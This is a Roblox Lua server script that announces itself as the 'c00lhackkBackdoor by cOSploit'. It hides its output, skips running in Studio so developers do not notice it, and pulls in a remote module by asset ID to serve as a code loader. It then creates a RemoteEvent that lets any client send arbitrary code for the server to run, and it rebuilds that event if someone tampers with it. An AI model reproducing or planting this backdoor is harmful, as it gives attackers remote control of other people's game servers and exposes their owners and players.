local mustTalk = false

local print = print
if not mustTalk then
	print = function()end
end

if game:GetService("RunService"):IsStudio() then 
	return 
end

print("[[-- Infected with c00lhackkBackdoor by cOSploit --]]")

local loadstring = require(14132891321)
local rmt
local conA
local conB
local newBD
local delBD
local onExec
local onExecP
local onTamper
function onExec(plr,...)
	for i,v in pairs({...}) do
		print("EXECUTING CODE:",...)
		onExecP(pcall(function()return loadstring:SpawnS(v,workspace)end))
	end
end
function onExecP(...)
	print("EXECUTION RESULT: [",...,"]")
	rmt:FireAllClients(plr,v)
end
function newBD()
	rmt = Instance.new("RemoteEvent",game:GetService("ReplicatedStorage"))
	conA = rmt.OnServerEvent:connect(onExec)
	conB = rmt.Changed:connect(onTamper)
	print("BACKDOOR CREATED")
	return rmt
end
function delBD()
	pcall(function()
		rmt:Destroy()
	end)
	rmt = nil
	pcall(function()
		conA:disconnect()
	end)
	conA = nil
	pcall(function()
		conB:disconnect()
	end)
	conB = nil
	print("BACKDOOR DELETED")
end
function onTamper()
	print("BACKDOOR TAMPERED? REFRESHING...")
	delBD()
	newBD()
end
newBD()